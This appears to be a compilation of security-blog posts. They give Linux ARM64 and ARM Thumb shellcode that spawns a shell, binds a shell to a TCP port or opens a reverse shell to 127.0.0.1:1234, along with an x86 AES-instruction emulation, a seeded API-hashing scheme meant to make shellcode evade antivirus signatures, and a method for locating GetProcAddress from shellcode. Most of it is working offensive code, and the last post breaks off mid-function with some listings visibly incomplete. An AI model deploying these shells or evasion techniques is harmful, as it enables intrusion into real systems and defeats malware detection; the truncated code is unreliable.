## Shellcode: Linux ARM (AArch64)

### Introduction

I’ve no idea how useful these will be since they were only tested on Linux Ubuntu. They were more or less derived from 32-bit codes shown here, except there’s no attempt at all to eliminate null bytes, and there are obviously different registers being used.

CPU parameters system call
32 r0-r6 r7
64 x0-x7 x8
• Registers r0-r6 on AArch32 are used for system call parameters while registers x0-x7 on AArch64 are used.
• Register r7 on AArch32 is used for the system call number while x8 is used on AArch64
• Accessing the program counter (PC) directly on AArch64 is no longer possible, although relative instructions like ADR and LDR are, so perhaps there’s no need to.
• You can no longer push/pop multiple registers which reminds of when AMD64 decided to abandon PUSHAD/POPAD.

Depending on your needs, these may require further modifcations. They all contain null bytes, so would require encoding or a complete rewrite to remove them. The following is the connect shell for example which contains many null bytes.

### Execute /bin/sh

```// 28 bytes
.global _start
.text

_start:
// execve("/bin/sh", NULL, NULL);
adr    x0, sh         // x0 = "/bin/sh"
eor    x1, x1, x1     // x1 = NULL
eor    x2, x2, x2     // x2 = NULL
mov    x8, #221       // x8 = execve
svc    0
sh:
.ascii "/bin/sh\0"
```

### Bind /bin/sh to TCP port

```// 136 bytes
.global _start
.text

_start:
// s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
eor    x2, x2, x2   // x2 = IPPROTO_IP
mov    x1, #1       // x1 = SOCK_STREAM
mov    x0, #2       // x0 = AF_INET
mov    x8, #198     // x8 = socket
svc    0

mov    x6, x0       // x6 = s

// bind(s, &sa, sizeof(sa));
mov    x2, #16      // x2 = sizeof(sa)
adr    x1, sin_port // x1 = &sa
mov    x8, #200     // x8 = bind
svc    0

// listen(s, 0);
eor    x1, x1, x1   // x1 = 0
mov    x0, x6       // x0 = s
mov    x8, #201     // x8 = listen
svc    0

// r = accept(s, 0, 0);
eor    x1, x1, x1
eor    x2, x2, x2
mov    x0, x6        // x0 = s
mov    x8, #202      // x8 = accept
svc    0

mov    x6, x0        // x6 = r

// dup2(r, FILENO_STDIN);
// dup2(r, FILENO_STDOUT);
// dup2(r, FILENO_STDERR);
mov    x1, #2        // for 3 descriptors
dup_loop:
mov    x0, x6        // x0 = r
mov    x8, #24       // x8 = dup2
svc    0
subs   x1, x1, #1    // subtract one
bpl    dup_loop

// execve("/bin/sh", NULL, NULL);
eor    x1, x1, x1
adr    x0, sh        // x0 = "/bin/sh"
mov    x8, #221      // x8 = execve
svc    0
sin_port:
.word  0xd2040002    // 1234, AF_INET
sh:
.ascii "/bin/sh\0"
```

### Reverse connect to port and spawn /bin/sh

```// 104 bytes
.global _start
.text

_start:
// s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
eor    x2, x2, x2  // x2 = IPPROTO_IP
mov    x1, #1      // x1 = SOCK_STREAM
mov    x0, #2      // x0 = AF_INET
mov    x8, #198    // x8 = socket
svc    0

// connect(s, &sa, sizeof(sa));
mov    x6, x0       // x6 = s
adr    x1, sin_port // x1 = sa.sin_port
mov    x2, #16      // x2 = sizeof(sa)
mov    x8, #203     // x8 = connect
svc    0

// dup2(s, FILENO_STDIN);
// dup2(s, FILENO_STDOUT);
// dup2(s, FILENO_STDERR);
mov    x1, #2        // for 3 descriptors
dup_loop:
eor    x2, x2, x2    // x2 = 0
mov    x0, x6        // x0 = s
mov    x8, #24       // x8 = dup2
svc    0
subs   x1, x1, #1    // subtract 1
bpl    dup_loop

// execve("/bin/sh", NULL, NULL);
adr    x0, sh        // x0 = "/bin/sh"
eor    x2, x2, x2    // x2 = NULL
eor    x1, x1, x1    // x1 = NULL
mov    x8, #221      // x8 = execve
svc    0
sin_port:
.word  0xd2040002    // 1234, AF_INET
.word  0x0100007f    // 127.0.0.1
sh:
.ascii "/bin/sh\0"
```

## Shellcode: Linux ARM Thumb mode

### Introduction

Just a quick post about some shellcodes for a raspberry pi 3 I purchased recently to learn ARM assembly. I highly recommend Writing ARM Assembly by Azeria Labs which brought me up to speed with the ARM architecture.

For those interested in developing your own, you can find a full list of Linux system calls in Thumb mode here

These examples are only intended for 32-bit Linux. BSD or other OS that run on RPI3 will most likely use completely different system call numbers.

Some of you might find these 32-bit codes with comments useful as a reference if nothing else. I’ll discuss 64-bit codes in later post.

### Assembling

If you want to assemble these codes on raspberry pi, you can use the GNU Assembler which should already be installed.

I use runsc to test out the codes.

### Thumb mode

Raspbian by default runs in ARM mode, but the architecture has support for several modes, one of which is Thumb. Thumb uses 16-bit opcodes which allows our final shellcodes to be more compact. You’ll see the following used for each code.

```// 8 bytes
.global _start
.text

_start:
// switch to thumb mode
.code 32
bx     r3
```

### Execute /bin/sh

```// 72 bytes
.global _start
.text

_start:
// switch to thumb mode
.code 32
bx     r3

.code 16
// execve("/bin/sh", NULL, NULL);
adr    r0, sh         // r0 = "/bin/sh"
eor    r1, r1, r1     // r1 = NULL
eor    r2, r2, r2     // r2 = NULL
strb   r2, [r0, #7]   // add null terminator
mov    r7, #11        // r7 = execve
svc    1
sh:
.ascii "/bin/shX"
```

### Execute command

```// 36+cmd bytes
.global _start
.text

_start:
// switch to thumb mode
.code 32
bx     r3

.code 16
// execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);
eor    r3, r3, r3     // r3 = NULL

adr    r0, sh         // r0 = "/bin/shX"
strb   r3, [r0, #7]   // add null terminator

adr    r1, c_arg      // r1 = "-cXX"
strb   r3, [r1, #2]   // add null terminator

adr    r2, cmd        // r4 = cmd
strb   r3, [r2, #18]  // add null terminator

push   {r0, r1, r2, r3}
eor    r2, r2, r2     // penv = NULL
mov    r1, sp         // r1 = argv
mov    r7, #11        // r7 = execve
svc    1
sh:
.ascii "/bin/shX"
c_arg:
.ascii "-cXX"
cmd:
.ascii "echo Hello, World!"
```

### Bind Shell

Yes, I’m aware the 32-bit value at sin_port has a null byte. You could change to 0xFF and zero with STRB as shown in other examples.

```// 88 bytes
.global _start
.text

_start:
// switch to thumb mode
.code 32
bx     r3

.code 16
// s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
eor    r2, r2, r2   // r2 = IPPROTO_IP
mov    r1, #1       // r1 = SOCK_STREAM
mov    r0, #2       // r0 = AF_INET
lsl    r7, r1, #8   // multiply by 256
add    r7, #25      // r7 = 256+25 = 281 = socket
svc    1

mov    r6, r0       // r6 = s

// bind(s, &sa, sizeof(sa));
mov    r2, #16      // r2 = sizeof(sa)
adr    r1, sin_port // r1 = sa.sin_port
add    r7, #1       // r7 = 281+1 = 282 = bind
svc    1

// listen(s, 0);
eor    r1, r1, r1   // r1 = 0
mov    r0, r6
add    r7, #2       // r7 = 282+2 = 284 = listen
svc    1

// r = accept(s, 0, 0);
eor    r2, r2, r2   // r2 = 0
eor    r1, r1, r1   // r1 = 0
mov    r0, r6       // r0 = s
add    r7, #1       // r7 = 284+1 = 285 = accept
svc    1

mov    r6, r0       // r7 = r

// dup2(r, FILENO_STDIN);
// dup2(r, FILENO_STDOUT);
// dup2(r, FILENO_STDERR);
mov    r1, #2       // for 3 descriptors
dup_loop:
mov    r7, #63      // r7 = dup2
mov    r0, r6       // r0 = r
svc    1
sub    r1, #1       //
bpl    dup_loop

// execve("/bin/sh", NULL, NULL);
adr    r0, sh       // r0 = "/bin/sh"
eor    r2, r2, r2   // r2 = NULL
eor    r1, r1, r1   // r1 = NULL
strb   r2, [r0, #7] // add null terminator
mov    r7, #11      // r7 = execve
svc    1
nop                 // alignment by 4 bytes
sin_port:
.word  0xd2040002
sh:
.ascii "/bin/shX"
```

### Reverse Connect

Default sockaddr_in values are : 127.0.0.1, 1234, AF_INET

This also contains null bytes in the sockaddr_in structure that you see at the end. One way to resolve this would be using the Move NOT (MVN) instruction.

```// 72 bytes
.global _start
.text

_start:
// switch to thumb mode
.code 32
bx     r3

.code 16
// s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
eor    r2, r2, r2  // r2 = IPPROTO_IP
mov    r1, #1      // r1 = SOCK_STREAM
mov    r0, #2      // r0 = AF_INET
lsl    r7, r1, #8  // multiply by 256
add    r7, #25     // 256+25 = socket
svc    1

// connect(s, &sa, sizeof(sa));
mov    r6, r0       // r6 = s
adr    r1, sin_port // r1 = sa.sin_port
mov    r2, #16      // r2 = sizeof(sa)
add    r7, #2       // r7 = 281+2 = connect
svc    1

// dup2(s, FILENO_STDIN);
// dup2(s, FILENO_STDOUT);
// dup2(s, FILENO_STDERR);
mov    r1, #2      // for 3 descriptors
dup_loop:
mov    r7, #63     // r7 = dup2
mov    r0, r6      // r0 = s
svc    1
sub    r1, #1      //
bpl    dup_loop

// execve("/bin/sh", NULL, NULL);
adr    r0, sh        // r0 = "/bin/sh"
eor    r2, r2, r2    // r2 = NULL
eor    r1, r1, r1    // r1 = NULL
strb   r2, [r0, #7]  // add null terminator
mov    r7, #11       // r7 = execve
svc    1
nop                  // alignment by 4 bytes
sin_port:
.word  0xd2040002
.word  0x0100007f
sh:
.ascii "/bin/shX"
```

view sources here

Posted in arm, assembly, pi, raspberry, security, shellcode | Tagged , , , , , | 1 Comment

## Emulation of AESENC and AESENCLAST instructions in x86 assembly

### Introduction

aesenc and aesenclast are AES-NI instructions impelemented on the x86 architecture.

Recently, a well known cryptographer J.P Aumasson published code to emulate these instructions in C, which would be very useful for emulators, and virtual machines in general.

The combination of ShiftRows and SubBytes in one line inspired me to write an implementation in x86 assembly.

The following code is not optimized for speed nor does it counter against electromagnetic attacks.

### Galois Multiplication

Used for the mix columns and substitution layers. Based on algorithm by Andreas Hoheisel.

```uint32_t gf_mul2 (uint32_t w) {
uint32_t t = w & 0x80808080;

return ( (w ^ t ) << 1) ^ ( ( t >> 7) * 0x0000001B);
}
```

The assembly …

### Sub Bytes

Derived from code here

```uint8_t sub_byte (uint8_t x)
{
uint8_t i, y=x, sb;

if (x) {
// calculate logarithm gen 3
for (i=1, y=1; i != 0; i++) {
y ^= gf_mul2(y);
if (y == x) break;
}
x = ~i;
// calculate anti-logarithm gen 3
for (i=0, y=1; i<x; i++) {
y ^= gf_mul2(y);
}
}

sb = y;

for (i=0; i<4; i++) {
y   = ROTL8(y, 1);
sb ^= y;
}
return sb ^ 0x63;
}
```

The assembly code, but bear in mind, it has no countermeasures to side channel attacks.

```; *****************************
; uint8_t sub_byte (uint8_t x)
; *****************************
sub_byte:
test   al, al            ; if (x)
xchg   eax, edx          ; y = x
jz     sb_l2
; calculate logarithm gen 3
mov    bh, 1             ; i = 1
mov    bl, 1             ; y = 1
sb_l0:
mov    al, bl            ; y ^= gf_mul2(y)
call   gf_mul2
xor    bl, al
cmp    bl, dl            ; if (y == x) break;
jz     sb_lx
inc    bh                ; i++
jnz    sb_l0             ; i != 0
sb_lx:
; calculate anti-logarithm gen 3
xor    bl, bl            ; i = 0
mov    dl, 1             ; y = 1
xor    bh, -1            ; x = ~i (bitwise NOT doesn't affect ZF)
jz     sb_l2
sb_l1:
mov    al, dl            ; al = y
call   gf_mul2
xor    dl, al            ; y ^= gf_mul2(y)
inc    bl                ; i++
cmp    bl, bh            ; i < x
jnz    sb_l1             ;
sb_l2:
mov    al, dl            ; if before sb_l0, dl is already zero
mov    cl, 4             ; loop 4 times
sb_l3:
rol    dl, 1             ; y = ROTL8(y, 1);
xor    al, dl            ; sb ^= y;
loop   sb_l3
xor    al, 0x63          ; sb ^= 0x63
mov    [esp+1ch], al
ret
```

### AESENC / AESCLAST

These 2 are combined by using a parameter last
Simply set last to zero or one.

```void aesenc (void *state, void *key, int last) {
w128_t  *s, *k, v;
uint32_t i, w;

s=(w128_t*)state;
k=(w128_t*)key;

// sub bytes and shift rows
for (i=0; i<16; i++) {
v.b[((((i >> 2) + 4 - (i & 3) ) & 3) * 4) + (i & 3)] = sub_byte(s->b[i]);
}

// if not last round
if (!last) {
// mix columns
for (i=0; i<4; i++) {
w = v.w[i];
v.w[i] = ROTR32(w,  8) ^
ROTR32(w, 16) ^
ROTL32(w,  8) ^
XT(ROTR32(w, 8) ^ w);
}
}
for (i=0; i<4; i++) {
s->w[i] = v.w[i] ^ k->w[i];
}
}
```

The x86 assembly code..

```; **********************************
; uint8_t aesenc (void *s, void *rk)
; **********************************
_aesencx:
xor    ecx, ecx          ; i = 0
lea    esi, [esp+32+4]
lodsd
push   eax               ; save state
lodsd
xchg   eax, ebx          ; ebx = round key
lodsd                    ; eax = last
pop    esi               ; esi = state
mov    edi, esp          ; edi = v
dec    eax               ; last--
pushfd
subbytes_shiftrows:
mov    al, [esi+ecx]     ; al = sub_byte(s[i])
call   sub_byte
mov    edx, ecx          ; edx = i
mov    ebp, ecx          ; ebp = i
shr    ebp, 2            ; ebp >>= 2
and    edx, 3            ; edx &= 3
sub    ebp, edx          ; ebp -= edx
and    ebp, 3            ; ebp &= 3
lea    edx, [edx+ebp*4]  ; edx = (edx + ebp * 4)
mov    [edi+edx], al     ; v.b[edx] = al
inc    ecx               ; i++
cmp    cl, 16            ; for (i=0; i<16; i++)
jnz    subbytes_shiftrows
popfd
mov    cl, 4
mix_columns:
mov    ebx, [edi]        ; w0 = v.w[i]
mov    eax, ebx          ; w1 = ROTR32(w0, 8)
ror    eax, 8
mov    esi, eax          ; w2 = ROTR32(w0, 8)
xor    eax, ebx          ; w1 ^= w0
call   gf_mul2
xor    esi, eax          ; w2 ^= gf_mul2(w1)
ror    ebx, 16           ; w0 = ROTR32(w0, 16)
xor    esi, ebx          ; w2 ^= w0
ror    ebx, 8            ; w0 = ROTR32(w0, 8)
xor    ebx, esi          ; w0 ^= w2
xchg   ebx, eax          ; eax = w0
stosd                    ; v.w[i] = eax
loop   mix_columns
add_round_key:               ; for (i=0; i<16; i++) {
mov    al, [edi]         ;   al = v.b[i]
xor    al, [ebx]         ;   al ^= rk[i]
inc    ebx               ;
mov    [esi], al         ;   s[i] = al
cmpsb                    ;
ret
```

The size of assembly code is 195 bytes. Approximately 300 for C generated assembly.

See original code by Aumasson here

## Introduction

String/Pattern Matching Algorithms are by far the most popular and easy way to detect a shellcode. The principle is simple: all codes have unique characteristics which can be used as signatures to identify in memory.

Even shellcodes with no prior analysis can contain some known value, or piece of code which at least makes it appear suspicious, and worthy of closer inspection.

The known values I’m referring to are of course API strings and hashes which have always been useful in detecting malicious code for 20+ years.

If we’re going to develop more advanced shellcodes that go undetected by modern AV solutions, we need to consider using a HLL like C or C++ along with unconventional programming that guarantees everything in a shellcode is permutable.

It’s not just the executable code that should be permutable, but the entire thing; code, data, constants, strings..everything.

What I show here today is how to create permutable API hashes using a hash function called Maru (Ma-roo), named after the Japanese cat.

Maru uses a block cipher to generate a hash of string. You don’t have to use a block cipher for this, but a cryptographic primitive can help protect the hashes against collision attacks found using Satisfiability Modulo Theories (SMT).

Also, read the section on cryptography in Quick introduction into SAT/SMT solvers and symbolic execution

CryptoSMT

## Signature detection

When viruses for MS-DOS started to appear 30 years ago, detection by signature was relatively simple.

In an attempt to hide code, authors used a simple XOR operation with an 8-bit value. For example, the ‘Skism Rythem Stack Virus-808‘ from 1991 used milliseconds of the current time to “encrypt” each new infection, so it would appear differently for 100 versions.

This is the entry point of that code, and its “decryption” process.

```jmp    virus_start

encrypt_val db 00h

virus_start:

call   encrypt         ; encrypt/decrypt file
jmp    virus           ; go to start of code

encrypt:

push   cx
mov    bx, offset virus_code ; start encryption at data

xor_loop:
mov    ch, [bx]        ; read current byte
xor    ch, encrypt_val ; get encryption key
mov    [bx], ch        ; switch bytes
inc    bx              ; move bx up a byte
cmp    bx,  offset virus_code + virus_size
; are we done with the encryption

jle    xor_loop        ; no? keep going
pop    cx
ret
```

Later in the code, the virus will update ‘encrypt_val’ using the milliseconds value of the current time.

```;
mov    ah, 2ch         ; get time
int    21h

mov    encrypt_val, dl ; save m_seconds to encrypt val so
; theres 100 mutations possible
```

There’s some effort to hide the body of the virus here, but the decrypter is still visible and easily detected. Moreover, a scanner can emulate the decrypter routine, exposing the body of virus in memory before performing detection by signature.

When Win32 viruses started to appear in 1997, there were no longer MS-DOS interrupts. Instead there were API functions, accessible through dynamic libraries or DLL, and this made detecting malware even easier. Any code with a large block of API strings in it, was immediately going to raise alarm bells.

Authors eventually started to use 32-bit checksums, the most popular of which was CRC32. Later, LSD-PL inspired a trend of using some basic Add-Rotate-Xor routine, like the following that appeared in their WASM package.

```i3: mov   esi,[4*eax+ebx]    ; ptr to symbol name

push  ebx      ; hash: h=((h<<5)|(h>>27))+c
push  eax
xor   ebx,ebx
i4: xor   eax,eax  ; hash loop
lodsb
rol   ebx,5
cmp   eax,0
jnz   i4
ror   ebx,5
cmp   ebx,ecx  ; hash compare
pop   eax
pop   ebx
je    i5       ; same: symbol found
inc   eax
jmp   i3       ; different: go to the next symbol
```

Most legitimate code doesn’t have to resolve an API by string or hash manually through Import Address Table (IAT) or Export Address Table (EAT) and if some code does behave this way, it’s usually up to no good.

What’s funny about API hashing; It was supposed to prevent signature detection of strings. So, instead of detecting by string, AV just detected the hash of an API string, which still makes it a perfectly valid signature.

Even the shellcodes generated by many popular payload tools (BeEF, Meterpreter, Veil) all use basic hashing algorithms with no entropy or randomization. They are consistently the same, thus are just as easy to detect as any API string itself.

Of course, these packages offer the ability to encrypt payloads with a stream or block cipher like RC4 or AES. Again though, even if it will pass a simple scan by AV or IDS, a more thorough analysis using an emulator can decrypt the main code and perform pattern matching afterwards, having no problem with detection.

## Plain strings problem

Ideally, an attacker would want everything obfuscated/encrypted during compilation and decrypted at run-time without using additional tools or code.

constexpr is ideal for C++ code, but for C, there’s no such feature unless of course, a compiler can be modified to encrypt all strings at compile time?

Some assemblers such as MASM and NASM support macro based compilation, but are cumbersome to work with on complex functions. (not that you couldn’t)

Z0MBiE already discussed the problem of plain strings in Data Encoding In Meta Viruses and Solving Plain Strings Problem In HLL around 2002 which did somewhat “solve” the problem, but if you look closely at the sources, there’s insufficient entropy used.

At the time, he provided a library VirStr with TASM macros that worked with Borland’s C compiler, but these do not work with mingw, msvc or clang, and the library has never been updated since.

The purpose of using entropy for hashing of API strings is obviously to increase the difficulty of detecting a payload. It’s not enough to avoid detection forever, but it’s certainly better than existing hash algorithms with no entropy at all.

## Hash function constructions

We can construct new hash algorithms from block ciphers, and these offer us the potential to use unique keys, thus generating completely different API hashes every time the key changes.

However, as you will see, very few block ciphers are suitable for lightweight applications such as shellcode.

Here are 3 potential constructions to use. (there are more, but only 3 are covered)

• ### Davies–Meyer

$H_i=E_{m_i}(H_{i-1})\oplus H_{i-1}$

Feeds each block of the message ($m_i$) as the key to a block cipher. Feeds the previous hash value ($H_{i-1}$) as the plaintext to be encrypted.

The output ciphertext is then also XORed with the previous hash value ($H_{i-1}$) to produce the next hash value ($H_i$).

In the first round when there is no previous hash value it uses a constant pre-specified initial value ($H_0$).

• ### Matyas–Meyer–Oseas

$H_i=E_g{(H_{i-1})}(m_i)\oplus m_i$

Feeds each block of the message ($m_i$) as the plaintext to be encrypted. The output ciphertext is then also XORed with the same message block ($m_i$) to produce the next hash value ($H_i$). The previous hash value ($H_{i-1}$) is fed as the key to the block cipher.

In the first round when there is no previous hash value it uses a constant pre-specified initial value ($H_0$).

• ### Miyaguchi–Preneel

$H_i = E_{g(H_{i-1})}(m_i)\oplus H_{i-1}\oplus m_i$

Feeds each block of the message ($m_i$) as the plaintext to be encrypted. The output ciphertext is then XORed with the same message block ($m_i$) and then also XORed with the previous hash value ($H_{i-1}$) to produce the next hash value ($H_i$).

The previous hash value ($H_{i-1}$) is fed as the key to the block cipher.

In the first round when there is no previous hash value it uses a constant pre-specified initial value ($H_0$).

## Choosing a block cipher

We know signature detections require some static value, and what better static values exist than cryptographic constants?

You can of course change them, but then it might affect security of the cipher. So, it’s better to choose a cipher that doesn’t use any constants, at all.

While looking at potential block ciphers, my top 3 were based on Add-Rotate-Xor (ARX) designs.

• ### Speck

Designed by the NSA, and published in 2013. Wide range of key and block sizes for different architectures. Proven to be the smallest software based block cipher available for most architectures.

Parameters for x86: 64-bit block, 128-bit key. For x86-64: 128-bit block, 256-bit key. Both implemented in 64 and 86 bytes respectively.

Here’s the x86 code.

Designed and published in 2015. Uses an Even-Mansour design with permutation function of SipHash. 128-bit keys, 128-bit blocks. Can be implemented in approx. 90 bytes using x86 assembly.

• ### XTEA

eXtended Tiny Encryption Algorithm. A Feistel cipher, published in 1997 after weaknesses found in TEA. 128-bit keys, and 64-bit block. Has a known constant, 0x9E3779B9 which makes it susceptible to signature based detection. Can be implemented in approx. 80 bytes.

Speck was just the better design for lightweight applications, and can’t be easily identified by signature. (at least not from any constants)

The padding used is similar to MD4. Instead of length in bits stored as 64-bit integer, only a 32-bit integer is used. Since it will never exceed 256-bits for Maru 1 or 512 bits for Maru 2, there didn’t seem any point using a 64-bit integer.

## Speck Parameters

Version 1 is suitable for 32-bit architectures while version 2 is suitable for 64-bit.

Ver. Cipher Block Size Key Size
1 Speck 64 128
2 Speck 128 256

## 32-bit Architectures

The following is implementation of Speck for Ver. 1

```uint64_t speck64_encrypt(const void *buf, const void *key)
{
uint32_t x0, x1;
uint32_t k0, k1, k2, k3;
int      i, t;
w64_t    r;

w64_t    *x=(w64_t*)buf;
w128_t   *k=(w128_t*)key;

k0 = k->w[0]; k1 = k->w[1];
k2 = k->w[2]; k3 = k->w[3];

x0 = x->w[0]; x1 = x->w[1];

for (i=0; i<27; i++) {
// encrypt block
x0 = (ROTR32(x0, 8) + x1) ^ k0;
x1 =  ROTL32(x1, 3) ^ x0;

// create next subkey
k1 = (ROTR32(k1, 8) + k0) ^ i;
k0 =  ROTL32(k0, 3) ^ k1;

XCHG(k3, k2);
XCHG(k3, k1);
}
// store result
r.w[0] = x0; r.w[1] = x1;
return r.q;
}
```

## 64-bit architectures

The following is implementation for Ver.2

```void speck128_encrypt(const void *in, const void *key, void *out)
{
uint64_t x0, x1;
uint64_t k0, k1, k2, k3;
uint64_t i, t;

w128_t   *x=(w128_t*)in;
w128_t   *r=(w128_t*)out;
w256_t   *k=(w256_t*)key;

k0 = k->q[0]; k1 = k->q[1];
k2 = k->q[2]; k3 = k->q[3];

x0 = x->q[0]; x1 = x->q[1];

for (i=0; i<34; i++) {
// encrypt block
x0 = (ROTR64(x0, 8) + x1) ^ k0;
x1 =  ROTL64(x1, 3) ^ x0;

// create next subkey
k1 = (ROTR64(k1, 8) + k0) ^ i;
k0 =  ROTL64(k0, 3) ^ k1;

// rotate left 64-bits
XCHG(k3, k2);
XCHG(k3, k1);
}
// store result
r->q[0] = x0; r->q[1] = x1;
}
```

## Maru Parameters

The numbers below (excluding Ver.) represent number of bits.

Ver. CPU Construction Padding Key Message Max. Input Output
1 32 Davies-Meyer Merkle-Damgard 64 128 256 64
2 64 Davies-Meyer Merkle-Damgard 128 256 512 128

There are 2 64-bit constants used to initialize $H_0$ which are not really of any significance.

I just wanted something “random” without using a random number generator. Here is how to generate them using SpeedCrunch.

The 2nd value shown is used to initialize $H_0$ in both versions. The n-bit seed is xor’d against these values to make the hash output different.

I’ve emphasized the importance of eliminating constants which are not really permutable, and can be used as signatures, so why use them here?

You don’t have to use them. I’m only using here for illustration, but you can generate your own values to initialize $H_0$ or just use zero instead.

## Maru 1

The only real difference between the two would be cipher parameters and local capacity for keys. We use a 32-bit seed here to initialize $H_0$.

```uint64_t maru (const char *key, uint32_t seed)
{
w64_t     h;
w128_t    m;
uint32_t  len, idx, end;

// initialize H with seed
h.q = MARU_INIT_H ^ seed;

for (idx=0, len=0, end=0; !end; ) {
// end of string or max len?
if (key[len]==0 || len==MARU_KEY_LEN) {
m.b[idx++] = 0x80;
// zero remainder of M
memset (&m.b[idx], 0, (MARU_BLK_LEN - idx));
// have we space in M for len?
if (idx >= MARU_BLK_LEN-4) {
// no, update H with E
h.q ^= E(&h, &m);
// zero M
memset (m.b, 0, MARU_BLK_LEN);
}
// add total len in bits
m.w[3] = (len * 8);
idx = MARU_BLK_LEN;
end++;
} else {
m.b[idx++] = (uint8_t)key[len++];
}
if (idx == MARU_BLK_LEN) {
// update H with E
h.q ^= E(&h, &m);
idx = 0;
}
}
return h.q;
}
```

## Maru 2

Here, we use a 64-bit seed. The 128-bit result is stored in out parameter.

```void maru2(const char *key, uint64_t seed, void *out)
{
w128_t  h, c;
w256_t  m;
int     len, idx, end;

// initialize H with seed
h.q[0] = MARU2_INIT_B ^ seed;
h.q[1] = MARU2_INIT_D ^ seed;

for (idx=0, len=0, end=0; !end; ) {
// end of string or max len?
if (key[len]==0 || len==MARU2_KEY_LEN) {
m.b[idx++] = 0x80;
// zero remainder of M
memset (&m.b[idx], 0, (MARU2_BLK_LEN - idx));
// have we space in M for len?
if (idx >= MARU2_BLK_LEN-4) {
// no, encrypt H
E(&h, &m, &c);
// update H
h.q[0] ^= c.q[0];
h.q[1] ^= c.q[1];
// zero M
memset (m.b, 0, MARU2_BLK_LEN);
}
// add total len in bits
m.w[(MARU2_BLK_LEN/4)-1] = (len * 8);
idx = MARU2_BLK_LEN;
end++;
} else {
m.b[idx++] = (uint8_t)key[len++];
}
if (idx == MARU2_BLK_LEN) {
// encrypt H
E(&h, &m, &c);
// update H
h.q[0] ^= c.q[0];
h.q[1] ^= c.q[1];
idx = 0;
}
}
memcpy(out, &h, sizeof(h));
}
```

## Testing

Both versions performed well when tested with Robert G. Browns dieharder tool.

The tests involved setting a string buffer to all 1s and incrementing sequentially to generate hashes, similar to how one might test a PRNG.

• Maru 1

• Maru 2

Of course, just because the hash output passed dieharder tests, that doesn’t necessarily mean we have a good hash function, but it’s at the very least a good sign.

## Example Hashes

• Maru 1

• Maru 2

As you can see above, once the seed value is changed, the hash output also changes.

## Summary

We can construct better hashing algorithms for API strings from block ciphers. Maru isn’t intended for digital signatures or mission critical applications that requires robust collision resistant hashing functions, but it is good enough for hashing short strings like API.

Maru is really an idea about how to introduce entropy into the string hashing process, while trying to increase difficulty of string collisions.

You can see full source for Maru hash here.

## Shellcode: The hunt for GetProcAddress

### Introduction

Recently revealed by Alex Ionescu, future releases of Windows will include Enhanced Mitigation Experience Toolkit (EMET) built into the kernel.

As more mitigation features appear in MSVC and the Windows operating system, the difficulty of locating API to exploit memory corruption vulnerabilities increases.

It got me thinking; If both the Import Address Table (IAT) and Export Address Table (EAT) are unavailable, what other ways can we resolve GetProcAddress for a Position Independent Code (PIC) ?

Surely there must be other ways?

What you see here is just some hours work and not extensive research into obtaining GPA when the IAT and EAT are inaccessible.

I don’t know how practical this idea would be in a real world scenario, but thought it was worth a quick post which might encourage others to find some alternatives.

### Signature Detection

Every algorithm used to detect malware can be repurposed to detect arbitrary code including that of GetProcAddress.

Detection of malicious code can range from simple searching of strings, constants (including crypto) or sequences of code bytes to more advanced methods like emulation and statistical analysis.

Locating GetProcAddress by signature is trivial because it’s the only API that will return the error code: STATUS_ORDINAL_NOT_FOUND

From Windows NT up to Windows 10, there’s a high probability simply searching either kernel32.dll or kernelbase.dll for a function with this constant is enough to locate the entry point of GetProcAddress.

### Search algorithm

Some pseudocode to describe search pattern:

```for each DLL in PEB
for each executable section in DLL
scan forward in memory for STATUS_ORDINAL_NOT_FOUND
if constant found
scan backward in memory for prolog bytes
if bytes found
break
end if
end if
end for
end for```

Simple enough in theory and for 32-bit legacy mode is effective.

However, it’s ineffective if GetProcAddress uses function chunking thus will not work for some DLL (specifically 64-bit versions).

On Windows 7, the location of our constant in kernelbase.dll appears inside a chunk of code.

Negating 0x3FFFFEC8 gives us 0xC0000138

On Windows 10, the location of constant is within the same GetProcAddress code thus entrypoint can be easily located via simple search.

To work with Win7, I would suggest a Length Disassembler Engine (LDE) in addition to emulating the relative jumps until you land in GetProcAddress again, but there are no LDE for 64-bit I know which would operate independently of memory. Maybe one isn’t needed?

Since we’re searching the sections of kernel32.dll or kernelbase.dll, let’s examine the PEs section header structure and what members we’re interested in.

```typedef struct _IMAGE_SECTION_HEADER {
BYTE  Name[IMAGE_SIZEOF_SHORT_NAME];
union {
DWORD VirtualSize;
} Misc;
DWORD SizeOfRawData;
DWORD PointerToRawData;
DWORD PointerToRelocations;
DWORD PointerToLinenumbers;
WORD  NumberOfRelocations;
WORD  NumberOfLinenumbers;
DWORD Characteristics;
```
• Misc.VirtualSize

The total size of the section when loaded into memory, in bytes. If this value is greater than the SizeOfRawData member, the section is filled with zeroes. This field is valid only for executable images and should be set to 0 for object files.

The address of the first byte of the section when loaded into memory, relative to the image base. For object files, this is the address of the first byte before relocation is applied.

• Characteristics

The characteristics of the image. Since we’re looking for executable code, we can test this value for IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE

Once we find an executable section, we perform a simple search for our signature, which in this case would be 4-byte sequence: 0x38, 0x01, 0x00, 0xC0

If found, we presume we’re in GetProcAddress code so we scan back in memory to find the prolog bytes which for 32-bit will be 0x55, 0x8B, 0xEC and 0x48, 0x89, 0x5C, 0x24, 0x08 for 64-bit.

```// 32-bit prolog
"\x55"             /* push ebp           */
"\x8b\xec"         /* mov ebp, esp       */

```

Even though most 32-bit API since XP SP2 have mov edi, edi before prolog which is intended for hotpatching, we can in most cases skip it without any consequences.

```// 64-bit prolog
"\x48\x89\x5c\x24\x08" /* mov [rsp+0x8], rbx */```

Another potential way to find the entry point on 64-bit once we’ve found the signature is to look for padding added by the compiler. (some compilers differ in what padding is used)

Functions are aligned on a 16-byte boundary; padding is used before and after GetProcAddress.

On Windows 7, 0x90 is used, which is the x86 opcode for No operation (NOP)

On Windows 10, 0xCC is used, which is the opcode for a software interrupt (INT3)

This may be useful for searching with a different algorithm which is the only reason I mention it.

### C code

For each DLL in the Process Environment Block (PEB)
Find either kernel32.dll or kernelbase.dll

```LPVOID get_gpa (VOID)
{
PPEB                  peb;
PPEB_LDR_DATA         ldr;
PLDR_DATA_TABLE_ENTRY dte;
DWORD                 i, h;
BYTE                  c;

#if defined(_WIN64)
#else
#endif

ldr = (PPEB_LDR_DATA)peb->Ldr;

dte->DllBase != NULL && api_adr == NULL;
{
